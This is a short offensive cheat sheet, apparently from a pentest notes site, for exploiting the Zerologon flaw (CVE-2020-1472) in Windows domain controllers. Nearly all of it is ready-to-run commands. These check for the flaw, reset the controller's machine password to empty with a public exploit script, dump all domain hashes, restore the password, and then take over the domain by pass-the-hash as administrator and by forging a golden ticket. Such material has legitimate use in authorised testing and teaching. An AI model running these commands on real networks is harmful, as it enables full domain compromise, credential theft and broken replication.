Skip to main content

Overview

CVE-2020-1472. Vulnerability in Netlogon protocol. Reset DC machine account password to empty → DCSync all hashes. Critical severity.
This attack changes the DC machine account password. Can break domain replication. Always restore original hash after exploitation.

Check Vulnerability

crackmapexec smb DC_IP -u '' -p '' -M zerologon
# https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py DC_HOSTNAME DC_IP

Exploit

Set Password to Empty

# https://github.com/dirkjanm/CVE-2020-1472
python3 cve-2020-1472-exploit.py DC_HOSTNAME DC_IP

DCSync with Empty Password

impacket-secretsdump -no-pass -just-dc DOMAIN/'DC_HOSTNAME$'@DC_IP

Restore Machine Account Password

Get Original Hash First (From DCSync Output)

# Note the DC machine account hash from secretsdump output
# DC_HOSTNAME$:NTLM_HASH

Restore

# https://github.com/dirkjanm/CVE-2020-1472
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD

Alternative — secretsdump to Get Hex

restorepassword.py -hexpass needs the hex-encoded plaintext machine password, which only comes from a local registry/LSA secrets dump ($MACHINE.ACC). A DCSync (-just-dc-user) returns only the NT hash, which -hexpass cannot use. Run a full secrets dump (no -just-dc* flags):
impacket-secretsdump -no-pass DOMAIN/'DC_HOSTNAME$'@DC_IP

Post-Exploitation

After DCSync:
# PtH as Domain Admin
impacket-psexec DOMAIN/administrator@DC_IP -hashes :NTLM_HASH

# Golden ticket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN administrator

Quick Reference

StepCommand
Checkcrackmapexec smb DC -M zerologon
Exploitpython3 cve-2020-1472-exploit.py DC_NAME DC_IP
DCSyncsecretsdump -no-pass DOMAIN/'DC$'@DC_IP
Restorepython3 restorepassword.py ...